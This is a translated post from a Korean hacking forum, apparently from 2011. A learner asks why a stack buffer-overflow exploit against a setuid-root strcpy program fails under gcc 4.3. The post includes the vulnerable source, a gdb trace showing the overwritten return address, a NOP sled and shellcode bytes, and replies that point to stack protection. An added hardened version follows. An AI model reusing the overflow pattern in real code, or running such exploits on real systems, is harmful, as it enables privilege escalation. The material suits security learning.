System Hacking

   joonoyang
   Buffer overflow attack doesn't work with gcc 4.3.

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1532


Hello.
If I downgrade gcc to a 2.x version it works fine, but with 4.3 it just doesn't work at all.
Could you please take a look?
Source
#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[])
{
        char buffer[200];
        if (argc > 1)
                strcpy(buffer, argv[1]);
        return(0);
}

Attack method: register the eggshell, and pass the eggshell as the argument
./exploit 280
Address of esp: 0xbffff8c4

user@box:~/proj2$ gdb ./vulnerable
(gdb) r $EGG
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user/proj2/vulnerable $EGG

Breakpoint 3, 0x080483a8 in main (argc=Cannot access memory at address 0x0
) at vulnerable.c:5
5       {
(gdb) info registers
eax            0xbffff744       -1073744060
ecx            0xbffff6c0       -1073744192
edx            0x2      2
ebx            0xb7fd8ff4       -1208119308
esp            0xbffff6bc       0xbffff6bc         <- This is the return address. (main function)
ebp            0xbffff718       0xbffff718
esi            0x8048410        134513680
edi            0x80482f0        134513392
eip            0x80483a8        0x80483a8 <main+4>


(gdb) x/2x 0xbffff6bc   <- I printed esp.
0xbffff6bc:     0xb7e98455      0x00000002
(gdb) c
Continuing.

## I set a breakpoint right after strcpy and looked at the return address location once more.
Breakpoint 2, main (argc=-1073743676, argv=0xbffff8c4) at vulnerable.c:9
9                       return(0);
(gdb) info registers
eax            0xbffff5dc       -1073744420
ecx            0xbffff5db       -1073744421
edx            0x114    276
ebx            0xb7fd8ff4       -1208119308
esp            0xbffff5c0       0xbffff5c0
ebp            0xbffff6a8       0xbffff6a8
esi            0x8048410        134513680
edi            0x80482f0        134513392
eip            0x80483e9        0x80483e9 <main+69>

(gdb) x/4x 0xbffff6bc
0xbffff6bc:     0xbffff8c4      0xbffff8c4      0xbffff8c4      0xbffff8c4
As you can see above, the return address has been changed to the address where the NOPs I want are located.

(gdb) x/16x 0xbffff8c4
0xbffff8c4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8d4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff8e4:     0x5e1feb90      0x31087689      0x074688c0      0xb00c4689
0xbffff8f4:     0x8df3890b      0x568d084e      0x3180cd0c      0x40d889db
I dumped that stack address. As expected, the NOPs are in there, so I expected it to slide through to the shellcode,
but it just exits normally.

Below is the binary with setuid set.
-rwsr-xr-x 1 root root 7256 2011-08-31 01:47 vulnerable


What could be the problem??????????? I've been struggling with this for two days now.

Actually, if I compile with gcc using the -mpreferred-stack-boundary=2 option it works fine,
but I want to try it with the current gcc version.

Thank you.

  Hit : 3369     Date : 2011/10/11 04:35



    
phpmyadmin: I think a stack guard is applied in versions around that one.. 2011/10/11
havu: It's an answer you already know.
Higher gcc versions will naturally do secure coding.
It's in the same vein as vulnerable code that works on vc6 not working on vc2010.
2011/12/31
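
Added example, not part of the original thread or the posters' code: a hardened form of the vulnerable program from the post, with the unbounded strcpy into buffer[200] replaced by a length-checked copy that rejects over-long arguments instead of writing past the buffer. The helper name copy_arg and the BUF_SIZE macro are assumptions of this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 200  /* same size as buffer[] in the post */

/* Copy src into dst, whose capacity is dstsz bytes including the NUL.
 * Returns 0 on success, -1 if src is NULL or does not fit.
 * Nothing is ever written past dst[dstsz - 1]; on failure dst is left empty. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;

    if (dst == NULL || dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Measure src, but never look further than the destination can hold. */
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz)           /* no NUL within dstsz bytes: input too long */
        return -1;

    memcpy(dst, src, n + 1);  /* n + 1 <= dstsz, terminator included */
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    /* Reject the argument instead of overflowing the stack buffer. */
    if (argc > 1 && copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```

The length check removes the overflow in the source itself, so the fix does not depend on which gcc version or compiler-side stack protection builds the program.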